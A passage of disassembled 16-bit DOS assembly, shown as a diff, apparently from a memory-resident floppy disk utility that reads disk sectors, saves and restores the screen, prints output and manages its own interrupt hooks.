ds:timer_low_+1 + push cs + pop ds + mov word ptr ds:[243Dh],ax +loc_103: + mov data_82,1738h + mov data_64,0 + mov data_68,2416h + mov data_67,1FFh + mov data_69,4Ah ; 'J' + mov data_70,0C5h + mov data_85,27F1h + call sub_75 + test data_73,0C0h + jz loc_106 ; Jump if zero + test data_74,2 + jz loc_104 ; Jump if zero + jmp loc_86 +loc_104: + cmp data_94,0 + jne loc_105 ; Jump if not equal + inc data_94 + call sub_65 + test data_73,0C0h + jz loc_103 ; Jump if zero + jmp loc_123 +loc_105: + mov data_62,20h ; ' ' + jmp loc_125 +loc_106: + call sub_53 + mov byte ptr ds:[21Ah],2 + mov al,byte ptr ds:[242Bh] + mov data_214,al + mov data_215,0FFFFh + mov word ptr ds:[223h],0 + mov word ptr ds:[21Fh],0 + mov word ptr ds:[212h],139h +loc_107: + mov cx,80h + mov si,word ptr ds:[212h] +loc_108: + mov word ptr ds:[218h],cx + mov word ptr ds:[214h],si + call sub_55 + sub ax,word ptr ds:[21Fh] + test cx,[si] + jz loc_113 ; Jump if zero + cmp ax,200h + jl loc_109 ; Jump if < + mov word ptr ds:[21Bh],ax + call sub_49 + call sub_53 + call sub_50 + mov ax,word ptr ds:[21Bh] + sub ax,200h +loc_109: + mov di,offset data_214 + add di,ax + mov al,data_56 + cbw ; Convrt byte to word + cmp al,9 + jne loc_110 ; Jump if not equal + clc ; Clear carry flag + rcr ax,1 ; Rotate thru carry + adc ax,0 +loc_110: + mov cx,ax + mov si,word ptr ds:[229h] +loc_111: + mov bx,225h + mov ax,[bx+si] + mov bx,[di] + or ax,bx + cld ; Clear direction + stosw ; Store ax to es:[di] + xor si,2 + nop ;*ASM fixup - sign extn byte + jz loc_112 ; Jump if zero + dec di +loc_112: + dec cx + jnz loc_111 ; Jump if not zero + mov word ptr ds:[21Dh],di + jmp short loc_114 + db 90h +loc_113: + cmp ax,200h + jl loc_114 ; Jump if < + call sub_49 + call sub_53 + call sub_50 +loc_114: + mov word ptr ds:[21Bh],ax + mov al,data_56 + cbw ; Convrt byte to word + add word ptr ds:[223h],ax + mov ax,word ptr ds:[21Bh] + mov cx,word ptr ds:[218h] + mov si,word ptr ds:[214h] + shr cx,1 ; Shift w/zeros fill + jz loc_115 ; Jump if zero + jmp loc_108 +loc_115: + inc word ptr ds:[212h] + mov ax,word ptr ds:[212h] + cmp ax,word ptr ds:[216h] + je loc_116 ; Jump if equal + jmp loc_107 +loc_116: + call sub_49 + call sub_54 + mov di,data_100 + mov ax,word ptr ds:[243Fh] + xchg ah,al + cld ; Clear direction + stosw ; Store ax to es:[di] + mov ax,word ptr ds:[243Dh] + xchg ah,al + stosw ; Store ax to es:[di] + mov ax,word ptr data_98 + stosw ; Store ax to es:[di] + mov data_100,di + inc data_95 + inc data_99 + call sub_12 + mov al,data_96 + cmp data_95,al + je loc_119 ; Jump if equal +loc_117: + mov byte ptr ds:[230h],1 + mov ds,data_25 + mov byte ptr ds:dsk_motor_tmr_,2 + push cs + pop ds + mov data_92,3AAh + call sub_45 + mov cx,88h + +locloop_118: + call sub_7 + call sub_9 + mov cx,word ptr ds:[22Bh] + mov data_82,1596h + loop locloop_118 ; Loop if cx > 0 + + jmp loc_79 +loc_119: + mov data_92,3C2h + call sub_45 + mov data_107,2 + mov data_110,0Ch +loc_120: + mov data_81,130Dh + mov byte ptr ds:[230h],0 + call sub_8 +loc_121: + and byte ptr ds:[22Eh],0 + mov sp,2B84h + mov ax,202h + push ax + push cs + mov ax,data_81 + push ax + mov word ptr cs:[1DCh],sp +loc_122: + mov ss,word ptr ds:[20Eh] + mov sp,word ptr ds:[208h] + mov es,word ptr ds:[210h] + mov bp,word ptr ds:[20Ah] + mov si,word ptr ds:[204h] + mov di,word ptr ds:[206h] + mov ax,word ptr ds:[1FCh] + mov bx,word ptr ds:[1FEh] + mov cx,word ptr ds:[200h] + mov dx,word ptr ds:[202h] + mov ds,word ptr ds:[20Ch] + iret ; Interrupt return +loc_123: + mov byte ptr ds:[22Fh],0 + mov dx,3F2h + mov al,8 + out dx,al ; port 3F2h, dsk0 contrl output + cmp byte ptr ds:[230h],0 + je loc_124 ; Jump if equal + jmp loc_117 +loc_124: + mov data_62,80h +loc_125: + mov data_92,3B6h + call sub_45 + call sub_12 + mov byte ptr ds:[22Dh],6 + call sub_7 + call sub_12 + call sub_8 + mov data_81,195Dh + jmp short loc_121 +sub_6 endp + +loc_126: + and byte ptr cs:[22Eh],7Fh + call sub_28 + jnc loc_128 ; Jump if carry=0 + clc ; Clear carry flag + call sub_11 + test byte ptr ds:[22Eh],20h ; ' ' + jnz loc_127 ; Jump if not zero + jmp loc_121 +loc_127: + jmp loc_120 +loc_128: + call sub_22 + call sub_23 + call sub_56 + call sub_20 + cmp data_62,80h + je loc_129 ; Jump if equal + cmp data_62,3 + je loc_132 ; Jump if equal + cmp data_62,40h ; '@' + je loc_131 ; Jump if equal + cmp data_62,20h ; ' ' + je loc_130 ; Jump if equal + mov dh,0Ah + mov dl,1Eh + mov si,441h + call sub_14 + jmp short loc_133 + db 90h +loc_129: + mov dh,0Ah + mov dl,20h ; ' ' + mov si,3DAh + call sub_14 + jmp short loc_133 + db 90h +loc_130: + mov dh,0Ah + mov dl,18h + mov si,420h + call sub_14 + jmp short loc_133 + db 90h +loc_131: + mov dh,0Ah + mov dl,22h ; '"' + mov si,402h + call sub_14 + jmp short loc_133 + db 90h +loc_132: + mov dh,0Ah + mov dl,1Dh + mov si,3EBh + call sub_14 +loc_133: + mov dh,0Eh + mov dl,20h ; ' ' + mov data_62,0 + mov si,40Fh + call sub_14 + call sub_13 +loc_134: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_135 ; Jump if equal + and al,0DFh + cmp al,52h ; 'R' + je loc_136 ; Jump if equal + cmp al,41h ; 'A' + je loc_135 ; Jump if equal + call sub_11 + jmp short loc_134 +loc_135: + call sub_24 + mov data_107,0 + mov data_110,6 + jmp loc_120 +loc_136: + call sub_24 + cli ; Disable interrupts + mov byte ptr ds:[22Eh],0C0h + call sub_7 + call sub_65 + mov cx,5 + jmp data_82 +loc_137: + call sub_19 + mov dh,0Dh + mov dl,15h + mov si,457h + call sub_14 + call sub_13 +loc_138: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + je loc_144 ; Jump if equal + cmp al,0Dh + je loc_139 ; Jump if equal + call sub_11 + jmp short loc_138 +loc_139: + call sub_19 + mov dh,0Dh + mov dl,21h ; '!' + mov si,47Fh + call sub_14 + call sub_13 + mov bp,0A2Bh +loc_140: + mov ah,2 + xor dx,dx ; Zero register + int 17h ; Printer dx=prn1, ah=func 02h + ; read status, ah=return status + test ah,10h + jz loc_143 ; Jump if zero + mov al,[bp] + cmp al,0 + je loc_144 ; Jump if equal + xor ah,ah ; Zero register + xor dx,dx ; Zero register + int 17h ; Printer dx=prn1, ah=func 00h + ; print char al, get status ah + test ah,29h ; ')' + jnz loc_141 ; Jump if not zero + inc bp + jmp short loc_140 +loc_141: + call sub_19 + mov dh,0Ch + mov dl,23h ; '#' + mov si,48Dh +loc_142: + call sub_14 + mov data_82,1A2Eh + jmp loc_74 +loc_143: + call sub_19 + mov dh,0Ch + mov dl,1Eh + mov si,499h + jmp short loc_142 +loc_144: + jmp loc_41 +loc_145: + cmp data_95,0 + jne loc_147 ; Jump if not equal + call sub_19 + mov dh,0Dh + mov dl,20h ; ' ' + mov si,38Dh + call sub_14 +loc_146: + mov dh,0Fh + mov dl,16h + mov si,368h + call sub_14 + call sub_13 + jmp short loc_148 + db 90h +loc_147: + mov ax,838h + mov cs:data_93,ax + call sub_21 + call sub_31 +loc_148: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + mov data_107,5 + mov data_110,15h + jmp loc_41 +loc_149: + cmp data_187,6666h + je loc_150 ; Jump if equal + mov data_187,6666h + jmp loc_41 +loc_150: + mov data_187,206Eh + jmp loc_41 +loc_151: + mov ax,11E0h + mov di,20h ; (' ') + call sub_30 + jc loc_152 ; Jump if carry Set + mov ax,12E6h + mov di,offset data_42 + call sub_30 + jc loc_152 ; Jump if carry Set + mov ax,12CCh + mov di,offset data_38 + call sub_30 + jc loc_152 ; Jump if carry Set + mov ax,127Ah + mov di,24h ; (' ') + call sub_30 + jnc loc_153 ; Jump if carry=0 +loc_152: + clc ; Clear carry flag + call sub_19 + mov dh,0Ch + mov dl,8 + mov si,327h + call sub_14 + jmp loc_146 +loc_153: + xor ax,ax ; Zero register + mov word ptr data_24,ax + mov si,offset 195h + mov di,20h ; (' ') + call sub_29 + mov si,offset 199h + mov di,24h ; (' ') + call sub_29 + mov si,offset 19Dh + mov di,offset data_38 + call sub_29 + mov si,offset 1A1h + mov di,offset data_42 + call sub_29 + mov es,data_26 + mov di,data_2e + xor ax,ax ; Zero register + stosw ; Store ax to es:[di] + mov es,data_27 + mov di,data_2e + xor ax,ax ; Zero register + stosw ; Store ax to es:[di] + push cs + pop es + call sub_24 + call sub_7 +loc_154: + mov data_107,0 + mov data_110,6 + call sub_24 + jmp loc_121 + +; +; SUBROUTINE +; + +sub_7 proc near + add byte ptr ds:[22Dh],1 + cli ; Disable interrupts + mov word ptr ds:[1D0h],ax + pop ax + pushf ; Push flags + push cs + push ax + mov word ptr ds:[1DCh],sp + mov word ptr ds:[1D2h],bx + mov word ptr ds:[1DAh],ss + mov word ptr ds:[1E2h],ds + mov word ptr ds:[1E4h],es + mov word ptr ds:[1E0h],bp + mov word ptr ds:[1D8h],si + mov word ptr ds:[1DEh],di + mov word ptr ds:[1D4h],cx + mov word ptr ds:[1D6h],dx + jmp loc_122 +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + mov al,data_29 + cbw ; Convrt byte to word + mov di,ax + mov ds,data_25 + and byte ptr ds:hdsk0_media_st_[di],0EFh + mov byte ptr ds:dsk_motor_tmr_,2 + mov byte ptr ds:dsk_recal_stat_,0 + push cs + pop ds + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + mov word ptr ds:[22Bh],cx + test byte ptr ds:[22Eh],20h ; ' ' + jz loc_ret_155 ; Jump if zero + pop ax + mov data_82,ax + jmp loc_126 + +loc_ret_155: + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + mov ah,0Eh + mov bh,0 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + push ax + push bx + mov al,7 + call sub_10 + pop bx + pop ax + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_12 proc near + call sub_7 + mov al,0B6h + out 43h,al ; port 43h, 8253 wrt timr mode + mov ax,180h + out 42h,al ; port 42h, 8253 timer 2 spkr + mov al,ah + out 42h,al ; port 42h, 8253 timer 2 spkr + in al,61h ; port 61h, 8255 port B, read + or al,3 + out 61h,al ; port 61h, 8255 B - spkr, etc + call sub_7 + in al,61h ; port 61h, 8255 port B, read + and al,0FCh + out 61h,al ; port 61h, 8255 B - spkr, etc + ; al = 0, disable parity + retn +sub_12 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + mov ah,2 + mov dx,2000h + mov bh,data_104 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + mov ah,2 + mov bh,0 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + call sub_15 + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_15 proc near +loc_156: + cld ; Clear direction + lodsb ; String [si] to al + cmp al,0 + je loc_ret_157 ; Jump if equal + mov ah,0Eh + mov bh,0 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_156 + +loc_ret_157: + retn +sub_15 endp + + +; +; SUBROUTINE +; + +sub_16 proc near +loc_158: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,1Bh + jne loc_159 ; Jump if not equal + pop ax + jmp data_89 +loc_159: + cmp al,0Dh + jne loc_160 ; Jump if not equal + mov al,data_103 + jmp short loc_161 + db 90h +loc_160: + cmp al,30h ; '0' + jl loc_162 ; Jump if < + cmp al,data_102 + jg loc_162 ; Jump if > +loc_161: + and ax,7 + retn +loc_162: + call sub_11 + jmp short loc_158 +sub_16 endp + + +; +; SUBROUTINE +; + +sub_17 proc near + mov cx,0FA0h + shr cx,1 ; Shift w/zeros fill + cld ; Clear direction + lodsb ; String [si] to al + inc si + xchg ah,al +loc_163: + lodsb ; String [si] to al + dec cx + jz loc_165 ; Jump if zero + inc si + cmp ah,al + jne loc_164 ; Jump if not equal + inc bx + jmp short loc_163 +loc_164: + call sub_26 + jmp short loc_163 +loc_165: + call sub_26 + retn +sub_17 endp + + +; +; SUBROUTINE +; + +sub_18 proc near + push ds + push es + mov si,data_1e + mov di,data_16e + mov bx,0 + mov ds,cs:data_91 + mov es,cs:data_91 + call sub_17 + mov si,data_2e + mov bx,0 + call sub_17 + pop es + pop ds + retn +sub_18 endp + + +; +; SUBROUTINE +; + +sub_19 proc near + mov ax,4ADh + mov data_93,ax + call sub_21 + retn +sub_19 endp + + +; +; SUBROUTINE +; + +sub_20 proc near + mov ax,6F7h + mov data_93,ax + call sub_21 + retn +sub_20 endp + + +; +; SUBROUTINE +; + +sub_21 proc near + push cx + push dx + push si + push di + push ax + xor di,di ; Zero register + mov si,cs:data_93 +loc_166: + lodsb ; String [si] to al + cmp al,1 + jne loc_169 ; Jump if not equal + lodsw ; String [si] to ax + mov cx,ax + test cl,80h + jz loc_167 ; Jump if zero + xchg ch,cl + and cx,7FFFh + lodsb ; String [si] to al + jmp short locloop_168 + db 90h +loc_167: + xchg al,ah + and cx,7Fh + +locloop_168: + call sub_25 + loop locloop_168 ; Loop if cx > 0 + + jmp short loc_170 + db 90h +loc_169: + call sub_25 +loc_170: + cmp di,0FA0h + jl loc_166 ; Jump if < + jnz loc_171 ; Jump if not zero + mov di,1 + jmp short loc_166 +loc_171: + pop ax + pop di + pop si + pop dx + pop cx + retn +sub_21 endp + + +; +; SUBROUTINE +; + +sub_22 proc near + push ds + mov ds,data_91 + mov si,data_4e + mov di,offset data_115 + mov cx,7 + cld ; Clear direction + repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] + pop ds + cmp cx,0 + jne loc_ret_172 ; Jump if not equal + mov data_92,0D5h + call sub_44 + +loc_ret_172: + retn +sub_22 endp + + +; +; SUBROUTINE +; + +sub_23 proc near + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov ah,3 + int 10h ; Video display ah=functn 03h + ; get cursor loc in dx, mode cx + mov data_104,bh + mov data_105,cx + mov data_106,dx + call sub_18 + retn +sub_23 endp + + +; +; SUBROUTINE +; + +sub_24 proc near + mov data_93,1000h + mov ax,data_91 + push ds + mov ds,ax + call sub_21 + pop ds + mov bh,data_104 + mov dx,data_106 + mov ah,2 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + mov ah,1 + mov cx,data_105 + int 10h ; Video display ah=functn 01h + ; set cursor mode in cx + retn +sub_24 endp + + +; +; SUBROUTINE +; + +sub_25 proc near + push es + mov es,cs:data_91 + mov dx,cs:data_90 + cli ; Disable interrupts + push ax +loc_173: + in al,dx ; port 0, DMA-1 bas&add ch 0 + test al,1 + jnz loc_173 ; Jump if not zero +loc_174: + in al,dx ; port 0, DMA-1 bas&add ch 0 + test al,1 + jz loc_174 ; Jump if zero + pop ax + mov es:[di],al + sti ; Enable interrupts + inc di + inc di + pop es + retn +sub_25 endp + + +; +; SUBROUTINE +; + +sub_26 proc near + cmp ah,1 + je loc_175 ; Jump if equal + cmp bx,0 + je loc_178 ; Jump if equal + cmp bx,1 + jne loc_175 ; Jump if not equal + xor bx,bx ; Zero register + xchg ah,al + stosb ; Store al to es:[di] + jmp short loc_179 + db 90h +loc_175: + push ax + inc bx + mov al,1 + stosb ; Store al to es:[di] + mov ax,bx + and bx,0FF80h + nop ;*ASM fixup - sign extn byte + jz loc_176 ; Jump if zero + or ax,8000h + xchg ah,al + stosw ; Store ax to es:[di] + jmp short loc_177 + db 90h +loc_176: + stosb ; Store al to es:[di] +loc_177: + xor bx,bx ; Zero register + pop ax +loc_178: + xchg ah,al +loc_179: + stosb ; Store al to es:[di] + retn +sub_26 endp + + +; +; SUBROUTINE +; + +sub_27 proc near + mov al,data_110 + mul data_111 ; ax = data * al + add ax,3Dh + mov di,ax + mov al,data_112 + mov cl,15h +loc_180: + call sub_25 + dec cl + cmp cl,0 + jne loc_180 ; Jump if not equal + retn +sub_27 endp + + +; +; SUBROUTINE +; + +sub_28 proc near + mov ds,data_25 + cmp byte ptr ds:video_mode_,7 + je loc_183 ; Jump if equal + cmp byte ptr ds:video_mode_,2 + je loc_182 ; Jump if equal + cmp byte ptr ds:video_mode_,3 + je loc_182 ; Jump if equal +loc_181: + push cs + pop ds + stc ; Set carry flag + retn +loc_182: + push cs + pop ds + clc ; Clear carry flag + retn +loc_183: + mov ds,cs:data_91 + xor si,si ; Zero register + mov cx,50h + xor bx,bx ; Zero register + cld ; Clear direction + +locloop_184: + lodsw ; String [si] to ax + cmp ah,al + jne loc_185 ; Jump if not equal + inc bx +loc_185: + loop locloop_184 ; Loop if cx > 0 + + cmp bx,0Ah + jg loc_181 ; Jump if > + jmp short loc_182 +sub_28 endp + + +; +; SUBROUTINE +; + +sub_29 proc near + mov cx,2 + mov es,data_25 + cld ; Clear direction + cli ; Disable interrupts + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + sti ; Enable interrupts + retn +sub_29 endp + + +; +; SUBROUTINE +; + +sub_30 proc near + clc ; Clear carry flag + mov word ptr ds:[1F0h],es + mov es,data_25 + cmp ax,es:[di] + jne loc_186 ; Jump if not equal + push cs + pop ax + cmp ax,es:[di+2] + je loc_187 ; Jump if equal +loc_186: + stc ; Set carry flag +loc_187: + mov es,word ptr ds:[1F0h] + retn +sub_30 endp + + +; +; SUBROUTINE +; + +sub_31 proc near + mov data_100,0F5h + mov data_97,9 + mov data_95,1 +loc_188: + mov al,data_95 + cbw ; Convrt byte to word + mov word ptr ds:[1A9h],0 + mov word ptr ds:[1ABh],ax + call sub_32 + mov dh,byte ptr ds:[1AFh] + mov dl,7 + sub dl,dh + mov dh,data_97 + mov si,0EDh + call sub_14 + mov si,data_100 + mov di,3A0h + cld ; Clear direction + call sub_35 + inc di + call sub_35 + mov data_100,si + mov dh,data_97 + mov dl,14h + mov si,3A0h + call sub_14 + mov si,data_100 + lodsw ; String [si] to ax + mov word ptr data_98,ax + mov data_100,si + mov word ptr ds:[1A9h],0 + mov word ptr ds:[1ABh],ax + call sub_32 + mov dh,byte ptr ds:[1AFh] + mov dl,2Dh ; '-' + sub dl,dh + mov dh,data_97 + mov si,0EDh + call sub_14 + mov bl,50h ; 'P' + xor bh,bh ; Zero register + cmp data_31,0 + jne loc_189 ; Jump if not equal + shr bx,1 ; Shift w/zeros fill +loc_189: + dec bx + mov ax,2 + mul bx ; dx:ax = reg * ax + mov bl,data_56 + xor bh,bh ; Zero register + mul bx ; dx:ax = reg * ax + mov bl,data_53 + add ax,bx + mov bx,word ptr data_98 + cmp byte ptr ds:[2423h],1 + je loc_190 ; Jump if equal + shl bx,1 ; Shift w/zeros fill +loc_190: + sub ax,bx + mov bx,200h + mul bx ; dx:ax = reg * ax + mov word ptr ds:[1A9h],dx + mov word ptr ds:[1ABh],ax + call sub_32 + mov dh,byte ptr ds:[1AFh] + mov dl,44h ; 'D' + sub dl,dh + mov dh,data_97 + mov si,0EDh + call sub_14 + mov al,data_99 + cmp data_95,al + jne loc_191 ; Jump if not equal + call sub_13 + retn +loc_191: + inc data_95 + inc data_97 + jmp loc_188 +sub_31 endp + + +; +; SUBROUTINE +; + +sub_32 proc near + mov di,0EDh + call sub_33 + mov word ptr ds:[1ADh],bx + mov byte ptr ds:[1AFh],bl + jz loc_195 ; Jump if zero +loc_192: + cld ; Clear direction + or al,30h ; '0' + stosb ; Store al to es:[di] + mov word ptr ds:[1A5h],0 + mov word ptr ds:[1A7h],0 + push di + mov di,word ptr ds:[1B0h] + add di,word ptr ds:[1B2h] + call sub_34 + pop di + mov ax,word ptr ds:[1A7h] + sub word ptr ds:[1ABh],ax + jnc loc_193 ; Jump if carry=0 + dec word ptr ds:[1A9h] +loc_193: + mov ax,word ptr ds:[1A5h] + sub word ptr ds:[1A9h],ax + dec word ptr ds:[1ADh] + cmp word ptr ds:[1ADh],0 + je loc_195 ; Jump if equal + call sub_33 +loc_194: + cmp bx,word ptr ds:[1ADh] + je loc_192 ; Jump if equal + push ax + mov al,30h ; '0' + stosb ; Store al to es:[di] + pop ax + dec word ptr ds:[1ADh] + cmp word ptr ds:[1ADh],0 + jne loc_194 ; Jump if not equal +loc_195: + mov ax,word ptr ds:[1ABh] + or al,30h ; '0' + cld ; Clear direction + stosb ; Store al to es:[di] + mov al,0 + stosb ; Store al to es:[di] + retn +sub_32 endp + + +; +; SUBROUTINE +; + +sub_33 proc near + mov dx,word ptr ds:[1A9h] + mov ax,word ptr ds:[1ABh] + mov word ptr ds:[1B0h],0 + mov word ptr ds:[1B2h],0 + cmp dx,0 + jne loc_196 ; Jump if not equal + cmp ax,2710h + jb loc_197 ; Jump if below +loc_196: + mov bx,2710h + mov word ptr ds:[1B0h],8 + div bx ; ax,dx rem=dx:ax/reg +loc_197: + cmp ax,0Ah + jb loc_200 ; Jump if below + mov word ptr ds:[1B2h],6 + xor dx,dx ; Zero register + mov bx,offset 1C8h +loc_198: + cmp ax,[bx] + jge loc_199 ; Jump if > or = + sub word ptr ds:[1B2h],2 + sub bx,2 + jmp short loc_198 +loc_199: + mov bx,[bx] + div bx ; ax,dx rem=dx:ax/reg +loc_200: + mov bx,word ptr ds:[1B0h] + add bx,word ptr ds:[1B2h] + shr bx,1 ; Shift w/zeros fill + retn +sub_33 endp + + +; +; SUBROUTINE +; + +sub_34 proc near + and al,0Fh + cbw ; Convrt byte to word + push ax + mov bx,offset 1C2h + mov bx,[bx+di] + mul bx ; dx:ax = reg * ax + add word ptr ds:[1A7h],ax + jnc loc_201 ; Jump if carry=0 + inc dx +loc_201: + add word ptr ds:[1A5h],dx + mov bx,offset 1B4h + pop ax + mov bx,[bx+di] + mul bx ; dx:ax = reg * ax + add word ptr ds:[1A5h],ax + retn +sub_34 endp + + +; +; SUBROUTINE +; + +sub_35 proc near + lodsb ; String [si] to al + call sub_36 + stosw ; Store ax to es:[di] + lodsb ; String [si] to al + call sub_36 + stosw ; Store ax to es:[di] + retn +sub_35 endp + + +; +; SUBROUTINE +; + +sub_36 proc near + mov ah,al + and ah,0Fh + mov cl,4 + shr al,cl ; Shift w/zeros fill + and al,0Fh + cmp al,0Ah + jge loc_202 ; Jump if > or = + add al,30h ; '0' + jmp short loc_203 + db 90h +loc_202: + add al,37h ; '7' +loc_203: + cmp ah,0Ah + jge loc_204 ; Jump if > or = + add ah,30h ; '0' + jmp short loc_ret_205 + db 90h +loc_204: + add ah,37h ; '7' + +loc_ret_205: + retn +sub_36 endp + + +; +; SUBROUTINE +; + +sub_37 proc near + mov al,data_29 + mov bx,offset data_30 + cbw ; Convrt byte to word + add bx,ax + mov al,[bx] + mov data_31,ax + retn +sub_37 endp + + +; +; SUBROUTINE +; + +sub_38 proc near + mov ah,1 + mov cx,7 + int 10h ; Video display ah=functn 01h + ; set cursor mode in cx + mov ah,3 + mov bh,data_104 + int 10h ; Video display ah=functn 03h + ; get cursor loc in dx, mode cx + mov data_108,dh + mov data_109,dl + mov di,137h + mov data_101,0 +loc_206: + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp al,0Dh + jne loc_207 ; Jump if not equal + retn +loc_207: + cmp al,1Bh + jne loc_208 ; Jump if not equal + pop ax + jmp loc_41 +loc_208: + cmp al,10h + je loc_209 ; Jump if equal + cmp ax,5300h + jne loc_210 ; Jump if not equal +loc_209: + call sub_41 + call sub_41 + jmp short loc_206 +loc_210: + cmp ax,4B00h + je loc_211 ; Jump if equal + cmp al,8 + jne loc_212 ; Jump if not equal +loc_211: + call sub_41 + jmp short loc_206 +loc_212: + cmp al,30h ; '0' + jb loc_213 ; Jump if below + cmp al,39h ; '9' + jg loc_213 ; Jump if > + cmp data_101,2 + je loc_213 ; Jump if equal + cld ; Clear direction + stosb ; Store al to es:[di] + inc data_101 + inc data_109 + call sub_10 + jmp short loc_206 +loc_213: + call sub_11 + jmp short loc_206 +sub_38 endp + + +; +; SUBROUTINE +; + +sub_39 proc near + mov si,offset data_33+6 ; (' ') +loc_214: + cmp al,0 + je loc_215 ; Jump if equal + add si,7 + dec al + jmp short loc_214 +loc_215: + mov di,offset data_189 +loc_216: + lodsb ; String [si] to al + cmp al,0 + jne loc_217 ; Jump if not equal + retn +loc_217: + stosb ; Store al to es:[di] +sub_39 endp + + +; +; SUBROUTINE +; + +sub_40 proc near + jmp short loc_216 +sub_40 endp + + +; +; SUBROUTINE +; + +sub_41 proc near + cmp data_101,0 + je loc_ret_218 ; Jump if equal + dec di + dec data_101 + dec data_109 + call sub_42 + mov al,20h ; ' ' + call sub_10 + call sub_42 + +loc_ret_218: + retn +sub_41 endp + + +; +; SUBROUTINE +; + +sub_42 proc near + mov ah,2 + mov bh,data_104 + mov dh,data_108 + mov dl,data_109 + int 10h ; Video display ah=functn 02h + ; set cursor location in dx + retn +sub_42 endp + + +; +; SUBROUTINE +; + +sub_43 proc near + push ds + mov ds,data_91 + mov si,data_4e + mov di,offset data_115 + mov cx,7 + cld ; Clear direction + repe cmpsw ; Rep zf=1+cx >0 Cmp [si] to es:[di] + cmp cx,0 + je loc_219 ; Jump if equal + mov di,offset data_113 + mov si,data_4e + mov cx,6 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] +loc_219: + pop ds + call sub_44 + mov di,offset data_115 + mov si,data_92 + mov cx,6 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + retn +sub_43 endp + + +; +; SUBROUTINE +; + +sub_44 proc near + push es + mov si,data_92 + mov es,data_91 + mov di,data_4e + mov cx,6 + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + pop es + retn +sub_44 endp + + +; +; SUBROUTINE +; + +sub_45 proc near + call sub_28 + jnc loc_220 ; Jump if carry=0 + retn +loc_220: + call sub_43 + retn +sub_45 endp + + +; +; SUBROUTINE +; + +sub_46 proc near + call sub_28 + jnc loc_221 ; Jump if carry=0 + clc ; Clear carry flag + retn +loc_221: + cmp data_187,6666h + je loc_222 ; Jump if equal + mov data_92,3CEh + mov ah,data_65 + call sub_47 + mov byte ptr data_184+26h,al ; ('') + mov byte ptr data_184+28h,ah ; ('') + call sub_43 + retn +loc_222: + cmp data_92,3AAh + jne loc_ret_223 ; Jump if not equal + mov data_92,0D5h + call sub_44 + +loc_ret_223: + retn +sub_46 endp + + +; +; SUBROUTINE +; + +sub_47 proc near + cmp ah,0Ah + jl loc_226 ; Jump if < + mov al,31h ; '1' +loc_224: + sub ah,0Ah + cmp ah,0Ah + jl loc_225 ; Jump if < + add al,1 + jmp short loc_224 +loc_225: + or ah,30h ; '0' + retn +loc_226: + or ah,30h ; '0' + mov al,20h ; ' ' + retn +sub_47 endp + + +; +; SUBROUTINE +; + +sub_48 proc near + cld ; Clear direction + mov di,offset 14Dh +loc_227: + mov al,data_65 + stosb ; Store al to es:[di] + mov al,data_64 + stosb ; Store al to es:[di] + mov al,data_66 + stosb ; Store al to es:[di] + mov al,2 + stosb ; Store al to es:[di] + inc data_66 + mov al,data_66 + cmp al,data_56 + jle loc_227 ; Jump if < or = + mov data_66,1 + retn +sub_48 endp + + +; +; SUBROUTINE +; + +sub_49 proc near + pop ax + mov word ptr ds:[221h],ax + mov data_82,21E2h + mov al,byte ptr ds:[21Ah] + mov data_66,al + mov data_68,28E9h + mov data_67,1FFh + mov data_69,4Ah ; 'J' + mov data_70,0C5h + mov data_85,27F1h + call sub_75 + mov data_82,220Dh + mov ax,word ptr ds:[242Ch] + mov cl,byte ptr ds:[21Ah] + add cl,al + cmp cl,data_56 + jle loc_228 ; Jump if < or = + inc data_64 + sub cl,data_56 +loc_228: + mov data_66,cl + call sub_75 + inc byte ptr ds:[21Ah] + jmp word ptr ds:[221h] + +; External Entry into Subroutine + +sub_50: + mov si,offset data_220 + mov cx,word ptr ds:[21Dh] + inc cx + sub cx,si + jbe loc_229 ; Jump if below or = + mov di,offset data_214 + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + xor al,al ; Zero register + mov cx,1Bh + mov di,offset data_220 + repne stosb ; Rep zf=0+cx >0 Store al to es:[di] +loc_229: + add word ptr ds:[21Fh],200h + mov word ptr ds:[21Dh],0 + retn +sub_49 endp + + +; +; SUBROUTINE +; + +sub_51 proc near + mov al,data_65 + dec al + cbw ; Convrt byte to word + mov bl,4 + div bl ; al, ah rem = ax/reg + mov cl,ah + cbw ; Convrt byte to word + mov di,ax + rol cl,1 ; Rotate + add cl,data_64 + mov al,80h + ror al,cl ; Rotate + or byte ptr ds:[139h][di],al + retn +sub_51 endp + + +; +; SUBROUTINE +; + +sub_52 proc near + mov data_65,0 + mov data_64,0 + mov data_66,1 + mov data_94,0 + mov data_63,0 + mov data_59,0F6h + retn +sub_52 endp + + +; +; SUBROUTINE +; + +sub_53 proc near + xor al,al ; Zero register + mov cx,200h + mov di,offset data_214 + cld ; Clear direction + repne stosb ; Rep zf=0+cx >0 Store al to es:[di] + retn +sub_53 endp + + mov di,data_100 + mov ax,0D1BAh + cld ; Clear direction + 